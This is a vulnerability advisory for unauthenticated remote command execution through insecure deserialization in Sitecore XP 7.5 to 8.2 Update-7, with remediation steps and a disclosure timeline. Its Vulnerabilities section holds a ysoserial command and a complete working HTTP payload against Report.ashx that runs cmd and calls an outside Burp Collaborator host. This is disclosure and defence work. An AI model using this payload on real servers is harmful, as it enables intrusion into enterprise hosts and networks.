Summary
Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to remote command execution through insecure deserialization. This vulnerability can be exploited without authentication and allows attackers to execute arbitrary commands on the host machine.
Impact
An attacker can execute arbitrary commands on the host machine running Sitecore. Sitecore is typically hosted on Windows, and in many cases the machines hosting Sitecore are also connected to a Windows domain. Opportunistic hackers could use this vulnerability as an entry point into an internal network / domain.
Affected Software
Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7
Product Description
Sitecore’s Experience Platform (XP) is an enterprise content management system (CMS). This CMS is used heavily by enterprises, including many of the companies within the fortune 500.
Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting.
Solution
In order to remediate this vulnerability, simply remove the <span class="code_single-line">Report.ashx</span> file from <span class="code_single-line">/sitecore/shell/ClientBin/Reporting/</span>.
The official remediation advice can be found here.
It suggests the following:
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions:
Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
Note: The Report.ashx file is no longer used and can safely be removed.
Vulnerabilities
Using <span class="code_single-line">ysoserial</span> we were able to generate a serialized payload which leads to RCE:
<span class="code_single-line">./ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "nslookup yuwewp90p365hx64wh7rumz8kzqxem.burpcollaborator.net" -o base64 -t</span>
The final payload to get command execution looks like the following:
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: sitecore.local
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Content-Type: text/xml
Content-Length: 5919
<?xml version="1.0" ?>
<a>
<query></query>
<source>foo</source>
<parameters>
<parameter name="">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
xmlns:x="http://www.w3.org/2001/XMLSchema"
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Count>
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
xmlns="">
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
xmlns="">
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
<a:delegateEntry z:Id="7">
<a:assembly z:Ref="6" i:nil="true"/>
<a:delegateEntry i:nil="true"/>
<a:methodName z:Id="8">Compare</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</a:delegateEntry>
<a:methodName z:Id="11">Start</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</Delegate>
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="11" i:nil="true"/>
<AssemblyName z:Ref="12" i:nil="true"/>
<ClassName z:Ref="13" i:nil="true"/>
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method0>
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="8" i:nil="true"/>
<AssemblyName z:Ref="6" i:nil="true"/>
<ClassName z:Ref="9" i:nil="true"/>
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method1>
</_comparison>
</Comparer>
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Version>
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
xmlns="">
<string z:Id="25"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup yuwewp90p365hx64wh7rumz8kzqxem.burpcollaborator.net</string>
<string z:Id="26"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
</Items>
</ArrayOfstring>
</parameter>
</parameters>
</a>
The above payload will execute <span class="code_single-line">cmd /c nslookup yuwewp90p365hx64wh7rumz8kzqxem.burpcollaborator.net</span>
Blog Post
The blog post detailing the discovery process for this issue can be found here.
Credits
Assetnote Security Research Team
Timeline
- 20/09/2021 - Reported to Sitecore
- 23/09/2021 - Initial response from Sitecore
- 08/10/2021 - Advisory published on Sitecore website
- 02/11/2021 - Blog post published on Assetnote blog